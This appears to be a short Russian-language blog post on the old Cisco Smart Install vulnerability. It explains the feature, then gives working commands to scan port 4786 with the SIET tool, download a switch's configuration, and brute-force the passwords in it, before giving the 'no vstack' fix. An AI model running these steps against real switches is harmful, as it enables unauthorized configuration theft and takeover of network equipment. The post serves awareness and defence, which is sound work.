Баге уже много лет, но она продолжает встречаться в сетях и по сей день.
Что такое
Если кратко, Smart Install представляет собой технологию, позволяющую автоматизировать процесс первоначальной настройки конфигурации и загрузки актуального образа операционной системы для нового сетевого коммутатора. Это означает, что новое оборудование, будучи извлеченным «из коробки», может быть сразу же установлено на свое постоянное место и все необходимые данные для его начальной работы будут доставлены по сети без участия администратора. В процессе работы технология обеспечивает так же резервное копирование конфигурации при ее изменении.
Посмотреть, включена ли функция в вашей железке можно в списке.
Уязвимость достаточно серьёзная, позволяет не просто содрать конфиг, но и подменить его, а также выполнить произвольные команды в консоли Cisco. Так что смотрим Proof и закрываемся!
Практическое применение
Проверяем, уязвим ли хост
# git clone https://github.com/frostbits-security/SIET
# cd SIET
# nmap -p 4786 -v <IP-addr> --script ./cisco-siet.nse
Сливаем конфиг
# python siet.py -g -i <IP-addr>
Конфиг слит. В последней строчке путь к файлу. Дальше можно изучить, поставить пароли на перебор и многое другое. Серьёзная дыра? Думаю, что да.
Как защититься
Подключаемся к cisco и отключаем фичу:
(config)# no vstack
Comments: